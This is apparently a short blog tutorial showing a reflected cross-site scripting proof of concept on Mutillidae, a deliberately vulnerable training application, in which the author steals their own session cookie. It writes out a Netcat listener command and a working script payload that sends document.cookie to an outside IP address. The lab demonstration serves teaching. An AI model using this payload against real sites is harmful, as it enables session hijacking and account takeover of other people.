Cookie Theft with Cross-site Scripting (XSS)

Simple proof on concept stealing cookies on a page vulnerable to XSS. Using Mutillidae as a vulnerable application, I’ll perform reflective cross-site scripting against myself and steal my own session cookie.

First, I’ll set up a listener using Netcat:

C:\Tools>nc -nlvp 4321

I’ll navigate to the vulnerable page:

xss_1

In the input field of the vulnerable page I’ll enter my demo JavaScript to capture the cookie header:

<script>document.location='http://192.168.0.6:4321/cgi-bin/grab.cgi?'+document.cookie;</script>

xss_2

When I click the “Lookup DNS” button, the JavaScript executes, and writes my cookie value to my Netcat listener:

xss_3

Leave a Reply

Your email address will not be published. Required fields are marked *